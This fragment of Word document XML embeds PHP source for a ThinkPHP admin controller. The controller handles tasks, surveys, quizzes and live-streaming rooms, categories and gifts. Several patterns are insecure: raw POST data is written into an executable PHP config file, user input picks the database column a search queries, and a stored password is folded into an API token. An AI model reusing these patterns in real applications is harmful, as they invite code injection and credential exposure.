      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520D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1E6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if(!$id){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152279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$titledb=Db::name('renwu')-&gt;where('name',$post['name'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66903F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46D8E8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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A640D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6D2F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$db=Db::name('renwu')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C49E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01427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402B0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CD53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29B4C5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6F85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50CE3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$db=Db::name('renwu')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C16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6458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74A2B5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117F6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2F512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3F6C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2F3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9409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$typeid=input("typeid/d");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7E9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$this-&gt;assign('typeid',$typeid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB36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62FC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$name=Db::name('renwu')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB1C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4C629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7D81F6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DD161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48D9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7AE1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272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6A280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4876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2FEBC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7FE3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4246D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22AE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2EAE2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7ECF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&lt;= 6){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A055D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不可删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD73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892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$db=Db::name('renwu')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44685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18B5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0AA6B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8C4C9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706FB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11B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BE319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243D1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B799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48292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03EB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3DA4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7D1FC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D41D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E6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$data=Db::name('renwu_typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F161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6B30DA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C494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F83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typeidadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1961B0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53AC8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C011D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71CF6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3DB9A0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154F2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$titledb=Db::name('renwu_typeid')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E56D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57AB5C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分组名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418ED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4BF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$db=Db::name('renwu_typeid')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7149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40B9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2C7B4B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113B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3D05C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2019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32A543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$db=Db::name('renwu_typeid')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D09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A0EFE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6C390C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3AE52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319DBE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90BC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8976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6A3AE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0778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$name=Db::name('renwu_typeid')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AE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AB3F9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6576A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45D91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49E7F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9B39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08B1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57D15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B50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D124C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103A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typeiddel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A618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5FFAF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7CFF4D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9448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&lt;= 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047380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['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新手任务和日常任务不可删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17C7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3E83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$db=Db::name('renwu_typeid')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CD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68920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15B91E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9CBE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1EB0E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FDD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B87C6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2CEA2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2AD9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2EBF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13D58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8B2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99E67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E493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diaochalist(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB62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$data=Db::name('diaocha')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F704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0C7F3A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$data[$k]['num']=count(json_decode($v['data']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8DD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73D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758672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41EFFC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C4A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diaochaadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AE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15DDC9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78815B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15A602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$post['data']=array_filter($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAF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$post['data']=json_encode($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672808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05E29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60871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$titledb=Db::name('diaocha')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBD0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26AB75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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA36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BC5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$db=Db::name('diaocha')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA72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0D4F3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0483F6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59EE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4C77EF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02C8F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387A54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$db=Db::name('diaocha')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F64E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F3D12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75049F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D78E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31F9D6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A15E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C3FD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6CE8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if($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BC3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$name=Db::name('diaocha')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C9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$name['data']=json_decode($name['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485819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6E7B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31CAE4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FA4A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A30B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FD6B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FF6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6571B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6BE1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0A91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7862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diaochadel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CAC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371822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400FA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48491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$db=Db::name('diaocha')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9FB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1A0A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2B120D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E8D01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328606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C41A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0338B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48B8A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3C83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49CBA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0BA18C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85C8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A6AB0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0870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diaochauser(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE48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$data=Db::name('diaocha_user')-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A826A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684E50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F6230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EAC1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diaochainfo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D004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5FF5ED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$data=Db::name("diaocha_user")-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A58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$data['data']=json_decode($data['data'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02339D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112F3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5CA1F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BA43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diaochauserdel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB634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51FB83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901D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1756D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$db=Db::name('diaocha_user')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA40C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28274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61C7F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5093E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5645E6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A54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9DD0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04CB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B0B2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ABB9F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1AE2D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AA97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77887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F51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datilist(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F04E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$data=Db::name('dati')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08E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5459FD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$data[$k]['num']=count(json_decode($v['data']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62C2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D45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A41B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6AF7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AF1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datiadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08285E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0FB128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A6ACB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E0DD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$post['data']=array_filter($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45317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$post['data']=json_encode($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A50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53161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11B1E6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$titledb=Db::name('dati')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DDFA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if($titledb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF26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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036ED4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D412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$db=Db::name('dati')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC82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7D7D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1D6CDF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C8FD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5DA7D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C1F4A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27821F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$db=Db::name('dati')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460152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BCA5A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5CED6D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B8DC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2976EC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69C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E4C2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8F849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182E41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$name=Db::name('dati')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183FC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$name['data']=json_decode($name['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8433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0DA884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14F39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611A21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2869A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E7F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F5B8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76A76B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E3DA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3417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ACF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datidel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0A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01E97C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7548EB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097D3D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$db=Db::name('dati')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A939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B0E41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3CFA7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F308D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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A572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351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210BB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6F551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135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6DC9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676AF0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87E6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4AC77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75C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D167F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63229F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app\admin\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F58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app\admin\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED28F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EC97E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Zhibo extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E0B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CD7D2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$token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC368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_initialize(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198041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Db::name('member')-&gt;order('id asc')-&gt;cache(true)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D97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$member['id'].'|www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5466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$this-&gt;token = _encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F60A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0244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config(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B70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$this-&gt;assign('cfg',$config['zhibo']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B066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A516C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0BED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73BC8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$data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224106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33A205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$data=var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C68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$data=str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00306E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5D0D0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$data=str_replace(")", "];", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5875B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$data="&lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361912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file_put_contents(APP_PATH.'extra/zhibo.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA7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保存成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EBF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1447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保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63F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5E5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45FE7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4E3864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74C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F1B8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0F269B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2CA3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6924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540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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8EA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00CAB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$search_name=input('param.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CF0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$search_type=input('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A549C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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF558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$map[$search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E8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18ACC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34E5B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389F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$db=Db::name('member_zhibo')-&gt;order('id desc,update_time desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76546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$data=$db-&gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20586F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$ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4F6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685DF9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$data[$k]['user'] = _user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784332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$type_2 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($v['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC03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$type_1 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($type_2['tid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47FF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$data[$k]['type_1'] = $type_1['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E196A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$data[$k]['type_2'] = $type_2['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AD8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$ids[$k] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF08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E8A6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if(count($data)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12577A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$zhibo = new \app\api\controller\Zhibo($this-&gt;token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F617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json_decode($zhibo-&gt;GetRoomsLiveInfo($ids),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5B0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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B818B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if(!empty($list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DCF4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$list['ret']['entities'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6C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($list as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00139C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$list_data[$k]['roomId'] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B61B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$status_data = [0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未开始</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'&lt;b style="color:#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正在直播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/b&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6619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$list_data[$k]['streamStatus'] = $status_data[$v['streamStatus']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA3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$list_data[$k]['playUserCount'] = $v['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D349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B617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C185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151CA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($list_data as $k_s =&gt; $v_s) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064419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if($v['roomId'] == $v_s['roomId']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E10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$data[$k]['streamStatus']   = $v_s['streamStatus'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E285B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$data[$k]['playUserCount']  = $v_s['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D9B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3F797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AD18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996A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8B8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E603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2E1DE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$db-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B80B5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23B1EC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BD98C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FEEB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lists_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45903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$category=Db::name('member_zhibo_type')-&gt;order('des desc,id asc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAF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$category=get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A07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$this-&gt;assign('category',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F09F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5B16F5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AD841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7554B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4D36B0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if(!$post['uid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462148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必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E83B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381E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Db::name('member')-&gt;find($post['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F684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644A67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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B46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4ACD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$member['id'].'|www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AED7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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7DBA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$zhibo = new \app\api\controller\Zhibo($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216AE4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json_decode($zhibo-&gt;CreateRoom($post),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD879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if(!empty($list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE3C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32462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964AE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$data=['err'=&gt;$list['msg']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E07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DF4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60132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Db::name('member')-&gt;find($post['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB17A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65B8D1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5511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8ECF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$member['id'].'|www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF98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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B1E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$zhibo = new \app\api\controller\Zhibo($token);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C305D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json_decode($zhibo-&gt;ModifyRoom($post),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26790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if(!empty($list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EAC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4CEEFD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78108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$data=['err'=&gt;$list['msg']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F87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91FE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DB5C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097ECC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06EE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$name=Db::name('member_zhibo')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6FD8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$zhibo = new \app\api\controller\Zhibo($this-&gt;token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD273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$name['data'] = json_decode($zhibo-&gt;GetRooms(['searchRoomId'=&gt;$name['roomId']]),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B37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if(!empty($name['data']['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7DC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$name['data'] = $name['data']['ret']['entities']['0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0FE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$status_data = [0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未开始</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正在直播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F4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$name['data']['status_name'] = $status_data[$name['data']['status']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF0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31B6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143BDD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57B23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C0488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04EB7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A03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7C0E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303E18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33A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CAE2E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2969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lists_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9EB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38EF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3F37B4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70452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$zhibo = new \app\api\controller\Zhibo($this-&gt;token);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED80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Db::name('member_zhibo')-&gt;cache(true)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174D4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json_decode($zhibo-&gt;DelRoom($name['roomId']),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FFB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Db::name('member_zhibo')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114DF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38C06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805C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7F761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4031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9BAA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37CCE8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00DC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B0D99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D31E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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534A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$category=Db::name('member_zhibo_type')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B9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$category=get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B922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$this-&gt;assign('data',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9F1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F93B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C59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type_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F552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226F5B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2524A7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0A3993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5DDDF3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if($post['tid']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0D1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lastRenderedPageBreak/>
        <w:t>$typename=Db::name('member_zhibo_type')-&gt;where(['title'=&gt;$post['title'],'tid'=&gt;0])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E245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if($typename){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63895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栏目名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273804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212A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26736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$db=Db::name('member_zhibo_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB21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769A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4A2FFD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E2D7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2039EF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9A4C2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70D80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$db=Db::name('member_zhibo_type')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA62C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0FF2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77532A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C9E56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716AB2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3D1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6FCB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2DD4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$category=Db::name('member_zhibo_type')-&gt;field('id,tid,title')-&gt;order('des desc,id asc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA755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$category=get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549493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$this-&gt;assign('category',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E804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A0094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$name=Db::name('member_zhibo_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034597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1FDD60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0ADA3D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16AD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2BCD5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3B1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389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4D87CB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9A4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19E4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04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type_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB8D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6A3A2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1E8B23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AEE4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$typeid=Db::name('member_zhibo_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036548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5F8C6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83732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88F5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732F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6EAC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18A128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8FB3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18F444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E989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liwu(){    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333EB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$data=Db::name('member_zhibo_liwu')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C17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1C172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75487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B343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liwu_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33389D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9D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15D281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$post=input('post.');;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C39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34FC38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$title=Db::name('member_zhibo_liwu')-&gt;where(['title'=&gt;$post['title']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AE0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6238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名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021FB1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4FB3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$db=Db::name('member_zhibo_liwu')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E23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3404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添加成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24119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16485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添加失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186CC9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089AB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8479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$db=Db::name('member_zhibo_liwu')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613072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AA83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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
